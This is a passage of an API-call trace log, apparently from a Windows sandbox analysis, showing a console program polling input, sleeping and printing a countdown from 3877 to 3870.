[0209.580] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.580] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602c
[0209.580] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083877") returned 8
[0209.580] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0209.580] __iob_func () returned 0x757a2900
[0209.580] _fileno (_File=0x757a2920) returned 1
[0209.580] _errno () returned 0x5507d8
[0209.580] _get_osfhandle (_FileHandle=1) returned 0x4c
[0209.580] _errno () returned 0x5507d8
[0209.580] GetFileType (hFile=0x4c) returned 0x2
[0209.580] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0209.580] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0209.580] lstrlenW (lpString="\x08\x08\x08\x083877") returned 8
[0209.720] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.720] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602c
[0209.720] Sleep (dwMilliseconds=0x64)
[0209.860] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.860] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602c
[0209.860] Sleep (dwMilliseconds=0x64)
[0209.986] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0209.986] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602c
[0209.986] Sleep (dwMilliseconds=0x64)
[0210.188] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0210.188] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602c
[0210.188] Sleep (dwMilliseconds=0x64)
[0210.351] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0210.351] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602c
[0210.351] Sleep (dwMilliseconds=0x64)
[0210.531] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0210.531] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602d
[0210.531] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083876") returned 8
[0210.531] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0210.531] __iob_func () returned 0x757a2900
[0210.531] _fileno (_File=0x757a2920) returned 1
[0210.531] _errno () returned 0x5507d8
[0210.531] _get_osfhandle (_FileHandle=1) returned 0x4c
[0210.532] _errno () returned 0x5507d8
[0210.532] GetFileType (hFile=0x4c) returned 0x2
[0210.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0210.532] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0210.532] lstrlenW (lpString="\x08\x08\x08\x083876") returned 8
[0210.718] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0210.719] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602d
[0210.719] Sleep (dwMilliseconds=0x64)
[0210.907] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0210.908] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602d
[0210.908] Sleep (dwMilliseconds=0x64)
[0211.099] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0211.099] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602d
[0211.099] Sleep (dwMilliseconds=0x64)
[0211.264] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0211.264] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602d
[0211.264] Sleep (dwMilliseconds=0x64)
[0211.432] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0211.432] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602d
[0211.432] Sleep (dwMilliseconds=0x64)
[0211.592] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0211.592] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602e
[0211.592] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083875") returned 8
[0211.592] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0211.592] __iob_func () returned 0x757a2900
[0211.592] _fileno (_File=0x757a2920) returned 1
[0211.592] _errno () returned 0x5507d8
[0211.592] _get_osfhandle (_FileHandle=1) returned 0x4c
[0211.592] _errno () returned 0x5507d8
[0211.592] GetFileType (hFile=0x4c) returned 0x2
[0211.592] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0211.592] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0211.593] lstrlenW (lpString="\x08\x08\x08\x083875") returned 8
[0211.717] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0211.717] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602e
[0211.717] Sleep (dwMilliseconds=0x64)
[0211.857] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0211.857] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602e
[0211.858] Sleep (dwMilliseconds=0x64)
[0211.997] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0211.998] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602e
[0211.998] Sleep (dwMilliseconds=0x64)
[0212.138] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.138] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602e
[0212.138] Sleep (dwMilliseconds=0x64)
[0212.278] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.278] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602e
[0212.278] Sleep (dwMilliseconds=0x64)
[0212.419] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.419] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602e
[0212.419] Sleep (dwMilliseconds=0x64)
[0212.543] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.544] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0212.544] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083874") returned 8
[0212.544] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0212.544] __iob_func () returned 0x757a2900
[0212.544] _fileno (_File=0x757a2920) returned 1
[0212.544] _errno () returned 0x5507d8
[0212.544] _get_osfhandle (_FileHandle=1) returned 0x4c
[0212.544] _errno () returned 0x5507d8
[0212.544] GetFileType (hFile=0x4c) returned 0x2
[0212.544] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0212.544] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0212.544] lstrlenW (lpString="\x08\x08\x08\x083874") returned 8
[0212.652] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.653] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0212.653] Sleep (dwMilliseconds=0x64)
[0212.762] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.763] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0212.763] Sleep (dwMilliseconds=0x64)
[0212.871] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.872] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0212.872] Sleep (dwMilliseconds=0x64)
[0212.980] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0212.980] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0212.981] Sleep (dwMilliseconds=0x64)
[0213.089] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.090] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0213.090] Sleep (dwMilliseconds=0x64)
[0213.207] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.207] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0213.207] Sleep (dwMilliseconds=0x64)
[0213.308] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.308] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0213.308] Sleep (dwMilliseconds=0x64)
[0213.417] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.417] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd602f
[0213.417] Sleep (dwMilliseconds=0x64)
[0213.526] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.526] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0213.527] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083873") returned 8
[0213.527] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0213.527] __iob_func () returned 0x757a2900
[0213.527] _fileno (_File=0x757a2920) returned 1
[0213.527] _errno () returned 0x5507d8
[0213.527] _get_osfhandle (_FileHandle=1) returned 0x4c
[0213.527] _errno () returned 0x5507d8
[0213.527] GetFileType (hFile=0x4c) returned 0x2
[0213.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0213.527] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0213.527] lstrlenW (lpString="\x08\x08\x08\x083873") returned 8
[0213.636] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.636] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0213.636] Sleep (dwMilliseconds=0x64)
[0213.746] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.746] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0213.746] Sleep (dwMilliseconds=0x64)
[0213.854] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.854] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0213.854] Sleep (dwMilliseconds=0x64)
[0213.963] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0213.963] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0213.963] Sleep (dwMilliseconds=0x64)
[0214.072] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.072] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0214.072] Sleep (dwMilliseconds=0x64)
[0214.183] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.183] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0214.183] Sleep (dwMilliseconds=0x64)
[0214.291] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.291] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0214.291] Sleep (dwMilliseconds=0x64)
[0214.400] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.400] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6030
[0214.400] Sleep (dwMilliseconds=0x64)
[0214.509] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.509] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0214.509] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083872") returned 8
[0214.509] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0214.510] __iob_func () returned 0x757a2900
[0214.510] _fileno (_File=0x757a2920) returned 1
[0214.510] _errno () returned 0x5507d8
[0214.510] _get_osfhandle (_FileHandle=1) returned 0x4c
[0214.510] _errno () returned 0x5507d8
[0214.510] GetFileType (hFile=0x4c) returned 0x2
[0214.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0214.510] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0214.510] lstrlenW (lpString="\x08\x08\x08\x083872") returned 8
[0214.618] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.619] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0214.619] Sleep (dwMilliseconds=0x64)
[0214.727] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.728] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0214.728] Sleep (dwMilliseconds=0x64)
[0214.837] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.837] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0214.837] Sleep (dwMilliseconds=0x64)
[0214.946] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0214.947] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0214.947] Sleep (dwMilliseconds=0x64)
[0215.055] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.055] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0215.055] Sleep (dwMilliseconds=0x64)
[0215.164] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.164] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0215.164] Sleep (dwMilliseconds=0x64)
[0215.273] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.274] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0215.274] Sleep (dwMilliseconds=0x64)
[0215.383] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.383] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6031
[0215.383] Sleep (dwMilliseconds=0x64)
[0215.492] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.492] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0215.492] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083871") returned 8
[0215.492] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0215.492] __iob_func () returned 0x757a2900
[0215.492] _fileno (_File=0x757a2920) returned 1
[0215.492] _errno () returned 0x5507d8
[0215.492] _get_osfhandle (_FileHandle=1) returned 0x4c
[0215.492] _errno () returned 0x5507d8
[0215.492] GetFileType (hFile=0x4c) returned 0x2
[0215.492] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0215.492] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0215.493] lstrlenW (lpString="\x08\x08\x08\x083871") returned 8
[0215.601] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.601] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0215.601] Sleep (dwMilliseconds=0x64)
[0215.710] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.710] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0215.711] Sleep (dwMilliseconds=0x64)
[0215.819] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.820] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0215.820] Sleep (dwMilliseconds=0x64)
[0215.929] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0215.929] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0215.929] Sleep (dwMilliseconds=0x64)
[0216.038] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.038] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0216.038] Sleep (dwMilliseconds=0x64)
[0216.147] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.147] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0216.147] Sleep (dwMilliseconds=0x64)
[0216.256] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.257] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0216.257] Sleep (dwMilliseconds=0x64)
[0216.365] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.366] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6032
[0216.366] Sleep (dwMilliseconds=0x64)
[0216.475] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.475] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0216.475] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083870") returned 8
[0216.475] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0216.475] __iob_func () returned 0x757a2900
[0216.475] _fileno (_File=0x757a2920) returned 1
[0216.475] _errno () returned 0x5507d8
[0216.475] _get_osfhandle (_FileHandle=1) returned 0x4c
[0216.475] _errno () returned 0x5507d8
[0216.475] GetFileType (hFile=0x4c) returned 0x2
[0216.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0216.475] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0216.475] lstrlenW (lpString="\x08\x08\x08\x083870") returned 8
[0216.584] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.584] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0216.584] Sleep (dwMilliseconds=0x64)
[0216.695] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.695] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0216.695] Sleep (dwMilliseconds=0x64)
[0216.802] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.802] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0216.803] Sleep (dwMilliseconds=0x64)
[0216.911] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0216.912] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0216.912] Sleep (dwMilliseconds=0x64)
[0217.025] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.025] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0217.025] Sleep (dwMilliseconds=0x64)
[0217.130] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0217.130] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6033
[0217.130] Sleep (dwMilliseconds=0x64)
[0217.239] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
